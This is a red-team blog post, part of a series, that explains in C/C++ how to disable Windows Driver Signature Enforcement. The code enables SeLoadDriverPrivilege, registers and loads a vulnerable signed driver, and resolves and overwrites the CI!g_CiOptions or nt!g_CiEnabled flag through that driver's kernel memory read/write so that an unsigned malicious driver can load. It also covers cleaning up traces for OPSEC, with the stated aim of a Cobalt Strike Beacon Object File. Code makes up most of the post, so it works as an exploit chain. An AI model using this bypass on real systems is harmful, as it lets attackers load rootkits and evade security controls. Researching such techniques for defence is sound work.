Kernel Karnage – Part 8 (Getting Around DSE)

When life gives you exploits, you turn them into Beacon Object Files.

1. Back to BOFs

I never thought I would say this, but after spending so much time in kernel land, it’s almost as if developing kernel functionality is easier than writing user land applications, especially when they need to fly under the radar. As I mentioned in my previous blogpost, I am in dire need of a Beacon Object File to disable Driver Signature Enforcement (DSE) from memory. However, writing a BOF with such complex functionality results in a lot of code and is hard to test and debug, especially when also using direct syscalls. So I decided to first write a regular C/C++ console application which should do exactly the same, except for the intergration part with CobaltWhispers which takes care of the payload.

2. May I load drivers, please?

The first task at hand is making sure the current process context we’re in has sufficient privileges to load or unload a driver. By default, even in elevated context, the required privilege SeLoadDriverPrivilege is disabled.

SeLoadDriverPrivilege disabled

Luckily, changing the privileges isn’t too difficult. At boot time, each privilege is assigned a locally unique identifier LUID. Using the LookupPrivilegeValue() function, the LUID associated with SeLoadDriverPrivilege can be retrieved and passed to NtAdjustPrivilegesToken() together with the SE_PRIVILEGE_ENABLED flag.

TOKEN_PRIVILEGES tp;
LUID luid;
HANDLE hToken;

status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);

LookupPrivilegeValue(nullptr, L"SeLoadDriverPrivilege", &luid)

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

NtAdjustPrivilegesToken(hToken, FALSE, &tp, 0, nullptr, 0);
SeLoadDriverPrivilege enabled

3. Down to business

Once the privileges are sorted, we can move on to the next step, which is creating the necessary registry key and its values. When a driver is loaded using the NtLoadDriver() API, a registry key is passed as parameter. This registry key is necessary because it contains the location of the driver on disk (this is why we need to touch disk to load a driver), as well as a couple of other values indicating the type of driver, the error handling when the driver fails to start and when in the boot sequence the driver should be started.

Creating registry keys is nothing new:

HANDLE hKey;
ULONG disposition;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING keyName;
RtlInitUnicodeString(&keyName, KeyName);

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NtCreateKey(&hKey, KEY_ALL_ACCESS, &oa, 0, nullptr, REG_OPTION_NON_VOLATILE, &disposition);

UNICODE_STRING keyValueName;
RtlInitUnicodeString(&keyValueName, L"ErrorControl");
DWORD keyValue = SERVICE_ERROR_NORMAL;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Type");
keyValue = SERVICE_KERNEL_DRIVER;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Start");
keyValue = SERVICE_DEMAND_START;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"ImagePath");
UNICODE_STRING DriverImagePath;
RtlInitUnicodeString(&DriverImagePath, DriverPath);
NtSetValueKey(hKey, &keyValueName, 0, REG_EXPAND_SZ, (BYTE*)DriverImagePath.Buffer, DriverImagePath.Length + sizeof(UNICODE_NULL));

The registry key has been successfully created and the ImagePath value points to the driver on disk.

Driver registry entrance

The registry key can then be passed to NtLoadDriver(), which will read the driver from disk and load it into memory. Once the driver is no longer needed, it can be unloaded by passing the same registry key to NtUnloadDriver(). For OPSEC considerations, once the driver is unloaded from the system, the registry key and binary on disk should also be removed, which is relatively easy with calls to NtOpenKeyEx(), NtDeleteKey() and NtDeleteFile().

NtLoadDriver(&keyName);
//do stuff
NtUnloadDriver(&keyName);

HANDLE hKey;
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtOpenKeyEx(&hKey, DELETE, &oa, 0);
NtDeleteKey(hKey);

InitializeObjectAttributes(&oa, &DriverImagePath, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtDeleteFile(&oa);

4. A touch of black magic and a sprinkle of luck

Now that I’m able to load and unload a signed driver, it’s time to figure out how to tackle DSE.

Driver Signature Enforcement is part of Windows Code Integrity (CI) and, depending on the Windows build version, it is located in ntoskrnl.exe or CI.dll as a global non-exported variable (flag). Before Windows 8 build 9600, the DSE flag is located in ntoskrnl.exe as nt!g_CiEnabled, which is a global boolean variable toggling DSE either enabled or disabled. In any other more recent builds, the DSE flag can be found in CI.dll as CI!g_CiOptions, which is a combination of flags (0x0=disabled, 0x6=enabled, 0x8=test mode).

For a more detailed write-up or insight into DSE I recommend A quick insight into Driver Signature Enforcement by @j00ru, Capcom Rootkit Proof-Of-Concept by @FuzzySec and Loading unsigned Windows drivers without reboot by @vikingfr.

In a nutshell, the idea is to (ab)use a vulnerable signed driver with an arbitrary kernel memory read/write exploit, locate either the g_CiEnabled or g_CiOptions variables in kernel memory and overwrite the value with 0x0 to disable DSE using the vulnerable driver. Once DSE is disabled, the malicious driver can be loaded, after which the DSE value should be restored as soon as possible, because DSE is protected by PatchGuard. Sounds relatively straightforward you might say, however the hard part is locating g_CiEnabled or g_CiOptions, because even though we know where to go looking, they are not exported so we will need to perform offset calculations.

Since in theory any vulnerable driver with the ability to read/write kernel memory can be used, I won’t be covering the specifics of my vulnerable driver. I relied heavily on KDU’s source code for the implementation of locating g_CiEnabled / g_CiOptions. A lot of code is copied directly from KDU and slightly modified to adjust for a single vulnerable driver, use lower level API calls, or direct syscalls and be overall more readable.

Starting from the top, I have a function ControlDSE() responsible for toggling the DSE value. This function calls QueryVariable() which returns the address in memory of the DSE variable and then calls the vulnerable driver via the DriverReadVirtualMemory() and DriverWriteVirtualMemory() functions to control the DSE value.

NTSTATUS ControlDSE(HANDLE DeviceHandle, ULONG buildNumber, ULONG DSEValue) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	ULONG_PTR variableAddress;
	ULONG flags = 0;

    // locate the address in memory of the DSE variable
	variableAddress = QueryVariable(buildNumber);

    DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
    if (DSEValue == flags) // current DSE value equals the DSE value we want to set
        return STATUS_SUCCESS;

    status = DriverWriteVirtualMemory(DeviceHandle, variableAddress, &DSEValue, sizeof(DSEValue));
    if (NT_SUCCESS(status)) {
        // confirm the new DSE value is written to memory
        flags = 0;

        DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
        if (flags == DSEValue)
            printf("New DSE value set\n");
        else
            printf("Failed to set new DSE value\n");
    }
	return status;
}

To locate the address of the DSE variable in memory, QueryVariable() first retrieves the base address of the loaded module in kernel space. Under the hood, GetModuleBaseByName() uses NtQuerySystemInformation() with the SystemModuleInformation information class to retrieve a list of loaded modules and then performs a basic string comparison until it has found the module it’s looking for. Next, QueryVariable() maps a copy of the module into its own virtual memory, which is later used to calculate offsets, and calls QueryCiEnabled() or QueryCiOptions() respectively depending on the build number.

ULONG_PTR QueryVariable(ULONG buildNumber) {
	NTSTATUS status;
	ULONG loadedImageSize = 0;
	SIZE_T sizeOfImage = 0;
	ULONG_PTR result = 0, imageLoadedBase, kernelAddress = 0;
	const char* moduleNameA = nullptr;
    PCWSTR moduleNameW = nullptr;
	HMODULE mappedImageBase;

	WCHAR szFullModuleName[MAX_PATH * 2];

	if (buildNumber < 9600) { // WIN8
		moduleNameA = "ntoskrnl.exe";
        moduleNameW = L"ntoskrnl.exe";
    }
	else {
		moduleNameA = "CI.dll";
        moduleNameW = L"CI.dll";
    }

    // get the base address of the module loaded in kernel space
	imageLoadedBase = GetModuleBaseByName(moduleNameA, &loadedImageSize);
	if (imageLoadedBase == 0)
		return 0;

	szFullModuleName[0] = 0;
	if (!GetSystemDirectory(szFullModuleName, MAX_PATH))
		return 0;

	wcscat_s(szFullModuleName, MAX_PATH * 2, L"\\");
	wcscat_s(szFullModuleName, MAX_PATH * 2, moduleNameW);

    // map a local copy of the module
	mappedImageBase = LoadLibraryEx(szFullModuleName, nullptr, DONT_RESOLVE_DLL_REFERENCES);

    if (buildNumber < 9600) {
        status = QueryImageSize(mappedImageBase, &sizeOfImage);

        if (NT_SUCCESS(status)) {
            // calculate offsets and find g_CiEnabled address
            status = QueryCiEnabled(mappedImageBase, imageLoadedBase, &kernelAddress, sizeOfImage);
        }
    }
    else {
        // calculate offsets and find g_CiOptions address
        status = QueryCiOptions(mappedImageBase, imageLoadedBase, &kernelAddress, buildNumber);
    }

    if (NT_SUCCESS(status)) {
        // verify if the found address is in a valid memory range associated with the loaded module in kernel space
        if (IN_REGION(kernelAddress, imageLoadedBase, loadedImageSize))
            result = kernelAddress;
    }

    FreeLibrary(mappedImageBase);
	return result;
}

The QueryCiEnabled() and QueryCiOptions() functions perform the actual black magic of calculating the right offsets using the kernel module and local mapped copy. QueryCiOptions() makes use of the Hacker Disassembler Engine 64 (modified to be a single C/C++ Header file) to inspect the assembly instructions and calculate the right offset. Once the local offset has been calculated and stored in the ptrCode variable, the actual address is calculated by adding the local offset to the kernel module base address and substracting the base address of the locally mapped copy.

NTSTATUS QueryCiOptions(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, ULONG buildNumber) {
	PBYTE ptrCode = nullptr;
	ULONG offset, k, expectedLength;
	LONG relativeValue = 0;
	ULONG_PTR resolvedAddress = 0;

	hde64s hs;

	*ResolvedAddress = 0ULL;

	ptrCode = (PBYTE)GetProcAddress(ImageMappedBase, (PCHAR)"CiInitialize");
	if (ptrCode == nullptr)
		return STATUS_PROCEDURE_NOT_FOUND;

	RtlSecureZeroMemory(&hs, sizeof(hs));
	offset = 0;

	if (buildNumber < 16299) {
		expectedLength = 5;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) { //test if jmp
                // jmp CipInitialize
                if (ptrCode[offset] == 0xE9) {
                    relativeValue = *(PLONG)(ptrCode + offset + 1);
                    break;
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}
	else {
		expectedLength = 3;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) {
                // Parameters for the CipInitialize.
                k = CheckInstructionBlock(ptrCode,
                    offset);

                if (k != 0) {
                    expectedLength = 5;
                    hde64_disasm(&ptrCode[k], &hs);
                    if (hs.flags & F_ERROR)
                        break;
                    // call CipInitialize
                    if (hs.len == expectedLength) {
                        if (ptrCode[k] == 0xE8) {
                            offset = k;
                            relativeValue = *(PLONG)(ptrCode + k + 1);
                            break;
                        }
                    }
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
	relativeValue = 0;
	offset = 0;
	expectedLength = 6;

	do {
        hde64_disasm(&ptrCode[offset], &hs);
        if (hs.flags & F_ERROR)
            break;

        if (hs.len == expectedLength) { //test if mov
            if (*(PUSHORT)(ptrCode + offset) == 0x0d89) {
                relativeValue = *(PLONG)(ptrCode + offset + 2);
                break;
            }
        }
        offset += hs.len;
    } while (offset < 256);

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
    // calculate the actual address in kernel space
    // by adding the offset and substracting the base address
    // of the locally mapped copy from the kernel module base address
	resolvedAddress = ImageLoadedBase + ptrCode - (PBYTE)ImageMappedBase;

	*ResolvedAddress = resolvedAddress;
	return STATUS_SUCCESS;
}

QueryCiEnabled() uses a hardcoded value of 0x1D8806EB to calculate and resolve the offset.

NTSTATUS QueryCiEnabled(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, SIZE_T SizeOfImage) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	SIZE_T c;
	LONG rel = 0;

	*ResolvedAddress = 0;

	for (c = 0; c < SizeOfImage - sizeof(DWORD); c++) {
		if (*(PDWORD)((PBYTE)ImageMappedBase + c) == 0x1d8806eb) {
			rel = *(PLONG)((PBYTE)ImageMappedBase + c + 4);
			*ResolvedAddress = ImageLoadedBase + c + 8 + rel;
			status = STATUS_SUCCESS;
			break;
		}
	}
	return status;
}

5. Conclusion

Programmatically loading drivers has its challenges, but it goes to show if you’re willing to mess around in memory a bit, Windows security components can be bypassed with relative ease. A lot of existing research and exploits are already out there and Microsoft has put in little effort to mitigate them or update existing functionality like Code Integrity to be better protected against attacks. Even if additional patches have fixed certain issues, chaining different exploits together still gets the job done.

I’m still busy investigating the exact workings of QueryCiEnabled() and QueryCiOptions() as I would like to remove dependencies on hardcoded offsets or external libraries/tools like Hacker Disassembler Engine 64. Once this process is complete, I can move on to optimizing code for OPSEC purposes, for example implementing direct syscalls as much as possible, and then convert the final result to a Beacon Object File for Cobalt Strike.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

3 thoughts on “Kernel Karnage – Part 8 (Getting Around DSE)

Leave a Reply